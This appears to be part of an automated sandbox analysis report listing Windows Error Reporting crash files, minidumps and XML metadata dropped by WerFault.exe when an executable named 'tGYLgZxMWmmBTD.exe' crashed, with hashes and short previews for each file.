                                                                                                                                                                                                              SHA-512:84EC27E4934325B13497A170764BD03368AA98C9EE223D1DE00F9BDE03603F57F38D7454BA4439C16CCAA3793F4CB17C9DA1A2DD7BD0697DA4A2ABD55974AC68
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.2.1.5.1.9.9.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.0.0.2.3.4.8.0.1.2.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.e.f.9.4.9.1.-.a.7.f.f.-.4.1.0.8.-.a.8.a.b.-.e.e.2.2.1.1.b.0.e.9.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.b.3.a.8.e.9.-.1.9.c.9.-.4.6.b.a.-.9.1.9.e.-.f.8.0.f.f.a.c.4.b.2.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.d.a.e.2.-.9.7.c.1.5.f.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.e.5.7.8.4.9.3.5.7.1.4.b.4.7.7.8.e.e.1.d.7.b.e.6.7.1.3.7.a.5.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.t.G.Y.L.g.Z.x.M.W.m.m.B.T.D...e.x.e.....T.
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9487347981952056
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6f5PnVeiRpfij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:K5vVDfbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:5EA689331AF296FCC2AEA4B18DEB3E87
                                                                                                                                                                                                              SHA1:EF61DFBEC38E3A8AC42C64C7CA8D0B0B01D2E2F3
                                                                                                                                                                                                              SHA-256:916E526E436B4EF5E2C20BE67383ED8C925E2529EEAA155219D493C302A83A8C
                                                                                                                                                                                                              SHA-512:7C2FC989D07E8A3E2D04A670D68E67FA1E5875778AF0EFC53EF5512F0FC72A00C5E2CCA10436B6B1349CF483009648A03CBB4145D18D953B7B6D29EF93ECEE7F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200239778837 ReportType=2 Consent=1 UploadTime=133758200247903764 ReportStatus=524384 ReportIdentifier=08f458bf-dcff-41ee-9571-8a52739bb31a IntegratorReportIdentifier=59291408-7852-4b66-b1fb-b601ac945685 Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00001ca0-0001-0014-f0b1-92c15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9482814524220444
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:PQBELFgeiRpLij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:IBnDLbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:4DF5DCCC1B3B737CACA3F2949E5A8F0A
                                                                                                                                                                                                              SHA1:B5EA6C549D6DDF14F34F78E14392F18C4DBA9AB1
                                                                                                                                                                                                              SHA-256:2C34457000520F14022CD609F3D35173A8DAE41BDD329CCF2CE445C5F52D3BC9
                                                                                                                                                                                                              SHA-512:B77A85FCCBC8FD5225C137A3081E2A41B4B64116127174E1EA0A645F89E733FF12A81E64316015E5CADDC25A0AA71D48870BB28CE65A498773C8008E0C9DE173
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200313193926 ReportType=2 Consent=1 UploadTime=133758200322256378 ReportStatus=524384 ReportIdentifier=32e20a01-1d87-4eb7-b808-ff0da1d0232f IntegratorReportIdentifier=0bf9c032-9c6b-462f-9a02-845f84e1d186 Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00000158-0001-0014-902f-83c15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9491122628919814
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:kgCeiRppij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:ODpbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:C463B3DA714A49F4A94C39EA5F662AFB
                                                                                                                                                                                                              SHA1:C90148F0ABD000BBC4D21BA2485382916AF0CCED
                                                                                                                                                                                                              SHA-256:34EB98F141AC536C2BC31BE621785A598A56EEF015C74C72BDD16B07C6F77360
                                                                                                                                                                                                              SHA-512:D227A54B6F30BEB2D795E955F6101DFA1EC7A384AC3E7F21D48657FA1979AACE7D6BEC726633723FDCA1BE71E7A5423EAD14CC2A47BF1A483FA02D0758330FD7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200223488177 ReportType=2 Consent=1 UploadTime=133758200236769678 ReportStatus=524384 ReportIdentifier=48f79613-1bc7-4f56-9158-af45c6a6c270 IntegratorReportIdentifier=5975ae83-b4b6-4085-92f2-76caf72f0269 Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00001cb8-0001-0014-98f6-94c15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9485464399895285
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ht1eiRpJij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:JDJbBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:6D0C71898C1036BA9DBF97353EC2E2E6
                                                                                                                                                                                                              SHA1:E23EEDC5505965BE55BD5C965BC6DCFE571863A0
                                                                                                                                                                                                              SHA-256:B007A36DFBDB1FC376A27D433B4BF7E064027C48AB67F3E0D74030E4C7BC319A
                                                                                                                                                                                                              SHA-512:F29C44041CC3CABE554D07FD17646FE015853BDA33C6B328E5B49F43690FA072364050BE528C8D7A97F97060FD355EC876AE33BB9027C3584A4AF37A52997431
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200249621847 ReportType=2 Consent=1 UploadTime=133758200260715098 ReportStatus=524384 ReportIdentifier=52f7a285-b762-402a-9972-663aea85983a IntegratorReportIdentifier=42326f51-8e8b-4a80-a3b7-48a58cad57b3 Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00001c88-0001-0014-76bd-91c15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.9487223752287894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:OlheiRpCij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcsS:aDCbBU/ojPczuiF2Y4IO8QcsS
                                                                                                                                                                                                              MD5:FEBE5F77057AA83A90391260DB371ABB
                                                                                                                                                                                                              SHA1:06D5FB6A7CCA105E10CD023FE9ACAB55C9CA1C88
                                                                                                                                                                                                              SHA-256:E98ADBEB30E1685EA637B7D093BB94763022389244C3451BD15B96F413991294
                                                                                                                                                                                                              SHA-512:6D8B50190066EF74DA346B6185399E4F9BC36E5DF548F4A8F020BD9D1A6D75DCC4694239E1DA7FB70AA2F77679FCB76AD49CB35A67FFB9AB8BF388009B918501
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200328646725 ReportType=2 Consent=1 UploadTime=133758200342553094 ReportStatus=524384 ReportIdentifier=a896522c-e56c-4e65-9c62-30ffa92d38b9 IntegratorReportIdentifier=ba76208f-4dc3-4ab3-b88c-c02ae4910cf3 Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00000f7c-0001-0014-68a5-81c15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                              Entropy (8bit):0.948119808669188
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:vQdfeiRp5ij0BU/bf+fxjRJkVzuiF0zZ24IO8m3fHcs:oD5bBU/ojPczuiF2Y4IO8Qcs
                                                                                                                                                                                                              MD5:75F305F4A8C049F57CB2236C73D93848
                                                                                                                                                                                                              SHA1:DC153EB3CD774EA29B51D243F833F9D39901ECA0
                                                                                                                                                                                                              SHA-256:A77D45F5383E8A5E6E997048FFD99EA2F743EFB53A8D08712663CDB82A1B7314
                                                                                                                                                                                                              SHA-512:12F06E08EDB8B84BDC43FBE09CA4973718CC02D70E7347DA08BEC6F115094648FAD8993D255DD5FD2685E769AC6FB157EBF40907260E4EDE03222BE48E75361D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                               Preview:Version=1 EventType=APPCRASH EventTime=133758200291134150 ReportType=2 Consent=1 UploadTime=133758200298634139 ReportStatus=524384 ReportIdentifier=bdf81a5d-831e-4732-831a-73aeea4608a6 IntegratorReportIdentifier=c0d50313-1740-443c-ba01-e44ee15219cb Wow64Host=34404 Wow64Guest=332 NsAppName=tGYLgZxMWmmBTD.exe AppSessionGuid=00001c2c-0001-0014-ed48-8ac15f34db01 TargetAppId=W:000642e5784935714b4778ee1d7be67137a50000ffff!00005536b7532400baf27beb2bfd425159264ad71136!tGYLgZxMWmmBTD.exe T
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:42 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):96734
                                                                                                                                                                                                              Entropy (8bit):1.994481622810103
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:dtcJksDDcz72/ggAYJGqxUeAMLsQFb5yFF+wWPyOVIs2iX:LcJdDQzSgFYVx3rLDFb5kFBC
                                                                                                                                                                                                              MD5:BFBF8151815AAD3436F51D1F7FAF4B72
                                                                                                                                                                                                              SHA1:5C277805C73C325B4DE904B56DBB9DFC27BA732B
                                                                                                                                                                                                              SHA-256:67913DD7BDAFE50489B7D8D94D1A01454EF7181E09EB6395E3E6715B040742C8
                                                                                                                                                                                                              SHA-512:1A331BC962A4D6E46239C19B9F4325549D22AC258712AAC79C189276B8F179B66EF6234E2E8F60D476AA5EBB30F30546BF72A218EE20500A21FA4667205A5736
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:42 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92934
                                                                                                                                                                                                              Entropy (8bit):1.7952654931214136
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LhtjPpARczgyf8qDTKM4hndL3a3Zw3HPGGHMMqqkffvCNBmuU:/Pp/zgsNSndQZKH1FK
                                                                                                                                                                                                              MD5:7B66D59FD5386AD690E9BDC877F98B78
                                                                                                                                                                                                              SHA1:35F773F697611CE048E5EB56F61B2AD911583BDE
                                                                                                                                                                                                              SHA-256:110FAEF3FE9079D72677DD5630AA913F7DA91A6E1A5BD1EFBE7D3D0576642FC1
                                                                                                                                                                                                              SHA-512:C68D980482F2FDCB1409FE721422441444EAE1A04D5635275986FA20A67D0D468790A34EFEB91AD64A3F0EF2BDE4E825037725ECC2B07A466A24E94140BBEE69
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.7069257972021874
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJ6ke6sJz6YSsSU91jgmfYfNprq89bGNsfFrim:R6lXJm6u6YZSU91jgmfQDGGfFP
                                                                                                                                                                                                              MD5:9B53746AC2192C87B29F21EE563950FC
                                                                                                                                                                                                              SHA1:324A3BE94B4059B211F3E619FE9CF55298D48B22
                                                                                                                                                                                                              SHA-256:33E40B5BE04B0BC5A0546229222F961F131B60A7C9D33924A29DDC728B4F0320
                                                                                                                                                                                                              SHA-512:42A060602E43C9DF4444790DDB67483734872A2A1B38BBB4CB8120C02F519EFD13798CD57E10F7AD6E53EB1FA2C60B16DFABD6886DD7B8F526E0200246D33390
                                                                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7376</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.531455618853338
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYMYm8M4JYwFQ+q8mPrNp/4Sid:uIjfYI7QI7VUJUnrb4Sid
                                                                                                                                                                                                              MD5:A736573270C183818C8B3178FC8C7A5D
                                                                                                                                                                                                              SHA1:DE35285F7AD02ED653AB723BFB360C5BB5D6BC6E
                                                                                                                                                                                                              SHA-256:9E2A03BC3855314404680F37172F6E2FB273FA9A76139C9BA6A7166CDF2D7521
                                                                                                                                                                                                              SHA-512:6F80BAB0D8E404ABE4697088CA09974BE872A3F3060DCA5B12EC90F0EBFDE754D74B9D76F526DF96F3A281A017A1DFA426B714001BB9C9E13D149B143B3AB258
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.706617188632087
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJYkj6P6YSHSU91jgmfYfNpr/89bGysfoim:R6lXJ96P6YSSU91jgmfQwGxfc
                                                                                                                                                                                                              MD5:160B81F2E9EFFD8BD36A0B0949A8FD3B
                                                                                                                                                                                                              SHA1:1ED1B0501C9909C469BEE95A09A788ACF90E092D
                                                                                                                                                                                                              SHA-256:57A10E1FFED507539AAD79BE14D5F991E8ECD59ADC6A296C9B23194CD6B61865
                                                                                                                                                                                                              SHA-512:2085B031886B67DAE0FD8B07A657079C08AE8BDFF5394DF518A8BB17B06B3C4562DA33A8FFD2CBCEC3544227FC00D6A657A830748805177E3E49B5383335062A
                                                                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7352</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.534012882858388
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYjoYm8M4JYwFd+q8m5pNp/4STd:uIjfYI7QI7VgJ5zb4STd
                                                                                                                                                                                                              MD5:E4FABB942ABA34DC9E7E7A5A441927ED
                                                                                                                                                                                                              SHA1:42C60002D9E4CB860F8F6E6DA9B85E962739EB4E
                                                                                                                                                                                                              SHA-256:60D5C32DCDDAF12C4F75EE12D8DDD5457E7D5462A6183B4171DB3A9F2EC76059
                                                                                                                                                                                                              SHA-512:B1E6C5D23C860306B79430B741B09B837E73294A605139F0E4A4C72164426415DFA9F7AAFC615E7C72A13EF637A582790D7011489646E41B04C860C80FF00D46
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:44 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70848
                                                                                                                                                                                                              Entropy (8bit):1.9023335086240334
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Y2kgV2Nczn8/qJ4vo0SgTgq84VmWDelMHnj:YgYaz8Q4vol5kDelMH
                                                                                                                                                                                                              MD5:C8955F9D80E24D7F962E8BCC7518945E
                                                                                                                                                                                                              SHA1:59445D3B96A45976BD5A5C1DE42877F3BB1E4736
                                                                                                                                                                                                              SHA-256:9F70729189C6158637CFCCFADED0FD7DC81B61D4FA7D65E185756D9B637D795B
                                                                                                                                                                                                              SHA-512:185CF8D9D0AFA71F30C1FFCBF4F2247B4DEC0504B6CBA5E4273B93912395317314A27378094ABEBC133CC6F69A344523B718645054B2199A6400A2F46766594D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.709721342230337
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJXkt6uT6YSkSU9V5gmfYfNpr089bwYsfuwm:R6lXJ26uT6YxSU9V5gmfQhwLfg
                                                                                                                                                                                                              MD5:2A2C91CAC6643966224243163A432047
                                                                                                                                                                                                              SHA1:0448F042DDD50B3677427F4D15D2322EED9387AE
                                                                                                                                                                                                              SHA-256:5BDC941439E1189816A9A881B21EF8532EC9AA950F7DEF4D0DB1633CE34155E1
                                                                                                                                                                                                              SHA-512:B35E7144B89A2FBD03C8874B4E71B972C5D1D4B8B5FBEF644CA9085F626CB8549A99FE94C6D93FEC66F0882FBC4BD111E043D09F614FC7C2949E634D1FE588A1
                                                                                                                                                                                                              Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7328</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.532236710255688
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYPYm8M4JYwFOH+q8mWKSNp/4SId:uIjfYI7QI7V3JyHeZb4SId
                                                                                                                                                                                                              MD5:D717633F27DA03224BC6D1B2B3B34BEE
                                                                                                                                                                                                              SHA1:F4D3DD023A51434E161611CB717CC310EB4983DC
                                                                                                                                                                                                              SHA-256:9AFB345706FB37EF1892BAED5E53EAA725D67FAA5F0C5DCB01934D2AD0829FD1
                                                                                                                                                                                                              SHA-512:DC2C1C4D01D695B61EFAC53729911AA9AEDC9E23994E14812BD55F0B94EE44516FAB33120C2677CC5F68487F6EC374DE28292D8EABF78FC6EEED86815BF4CB6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:45 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73752
                                                                                                                                                                                                              Entropy (8bit):1.9715198810424686
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:iBkgVwZczyWgdODH2pjosC1BcHtYW59Bc2F:jgmezyW+OwjolBUYWxJ
                                                                                                                                                                                                              MD5:A5C778B8F11785EEE9B7E3BEE95B5933
                                                                                                                                                                                                              SHA1:9E67553A80569D20792B06F7FAD1B326CC30481C
                                                                                                                                                                                                              SHA-256:2938CC7AC7F405782ED8D810E0AF0974C3D852D427CD264B0EEBC0E4FF2489D6
                                                                                                                                                                                                              SHA-512:DF87E9AC6D256074629ECB7289FFFFEB6D19C10A37BDA88E18C0ADDF898819164B2BDA0E05C9C8DCBE1A9FC0726C65AF1B83E16F34F5A0FBAEF0E2A9BFA62122
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.707446617213234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJ2Gkx6Crk6YSNSU9BFgmfYfNprw89b5Psfezm:R6lXJE6Crk6YoSU9BFgmfQ950f7
                                                                                                                                                                                                              MD5:5591EF73493CA226F0406538DCD9DBA3
                                                                                                                                                                                                              SHA1:6E883A7184348CC23027941478E7B2CC885C07F8
                                                                                                                                                                                                              SHA-256:DBBE987EFFDF55A5D9E4569ECCE06BBD90ED20587E804479CD937B432B29FF0B
                                                                                                                                                                                                              SHA-512:067AFB9A227156682CAEF92D1AA36314A5244EA2558625E8F03BC01B730D65AC3350A6043A756C84E78D76AF1CA81BF5B3B61656A74157D35FB98D9D4C0608E5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>7304</Pi
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.533154458382149
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYnYm8M4JYwFi1+q8mKzNp/4S5d:uIjfYI7QI7VTJw0b4S5d
                                                                                                                                                                                                              MD5:CE3EA233F2C2D39888D4D6DF78945A5E
                                                                                                                                                                                                              SHA1:90384187F783034EACE620E83720AE3563E358B6
